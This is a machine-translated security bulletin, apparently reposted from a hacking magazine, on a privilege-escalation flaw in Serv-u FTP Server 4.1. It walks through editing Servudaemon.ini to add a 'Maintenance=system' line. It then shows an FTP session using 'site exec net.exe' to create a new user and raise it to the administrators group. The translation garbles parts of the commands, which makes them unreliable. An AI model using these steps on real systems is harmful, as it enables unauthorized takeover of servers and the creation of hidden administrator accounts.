Server|serv-u serv-u FTP server for Rhinosoft produced an FTP sserver software, is currently widely used in the world. My research found that the Serv-u FTP server configuration file is stored in the Servudaemon.ini file in the Serv-u FTP server file directory. If a locally restricted user or an attacker who remotely has normal privileges can access the file and carefully construct the contents of the Servudaemon.ini file, the FTP process can be used to execute arbitrary commands with system privileges on the systems
Iv. Defect Analysis:
Serv-u FTP Serve the configuration information is stored with the Servudaemon.ini file after the user is set up. Includes the user's permission information and accessible directory information. Local limited users or remote attackers can read and write serv-u FTP serve file directories, and the FTP process executes arbitrary commands with FTP administrator privileges on remote, local systems by modifying the Servudaemon.ini file in the directory. and is not affected by the system version. (User information selected in the storage and system registry is not affected by this flaw)
Five, test method:
1. Local test
Assume that local limited users can browse the Serv-u FTP serve file directory. Locate the Servudaemon.ini file. Use Notepad to open the original file roughly as follows:
[GLOBAL]
version=4.1.0.0//serv-u FTP Server version number
processid=584
registrationkey=ueyz459wabr4lvrkikh4dyw9f8v4j/ahlvpok8tqokyz4d3wbymil1vkkjgdaelpdkswm5doxjsgw64yiypdo+ Wagnubuycb
[DOMAINS]
domain1=127.0.0.1| | 21|127.0.0.1|1|0//Host IP and domain name, port condition
[Domain1]
User1=zihuan|1|0
[User=zihuan|1]
Password=rfe8dfbe3f7ec27fb043d4305a04e6d2c6
Homedir=c:\//can browse the directory
timeout=600
access1=c:\| Rwamlcdp
The above content is more than the original content of a "Maintenance=system" modified to save after the completion. Then execute the following command after logging in with FTP to serv-u FTP server:
Ftp>open IP
Connected to IP.
Serv-u FTP Server v4.1.0.0 for WinSock ready ...
User (IP: (none)): ID//Input constructed users
331 User name Okay, please send complete e-mail address as password.
Password:password//password
230 User logged in, proceed.
Ftp> CD winnt//Enter Win2K winnt directory, if it is WinXP or Windows Server 2003 should be a Windows directory.
Directory changed to/winnt
FTP>CD System32//Enter System32 directory
Directory changed To/winnt/system32
Ftp>quote site exec net.exe user Zihuan Zihuan/add//utilizes the system's Net.exe file plus user.
EXEC command Successful (tid=33).
Ftp>quote site exec net.exe localhost administrators zihuan/add//promotion to Superuser
This adds a superuser with the Zihuan password: Zihuan on the local system. You can also use the quote site exec net.exe localhost Administrators user/add command to elevate the current user to the Super user group. You can, of course, execute any commands on the system.
Statement:
The book is only used to describe possible security issues, and the author and Hacker X-Files magazine do not provide any guarantee or commitment to this security bulletin. Any direct or indirect consequences and losses arising from the dissemination and use of the information provided by this article shall be the responsibility of the user himself and the author of this article shall not be liable for this purpose. The author has the right to modify and interpret this security bulletin. If you wish to reproduce or disseminate this article, you must ensure the integrity of this article, including all the contents of the copyright notice. Without the author's permission, may not arbitrarily modify or add or subtract this article announcement content.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
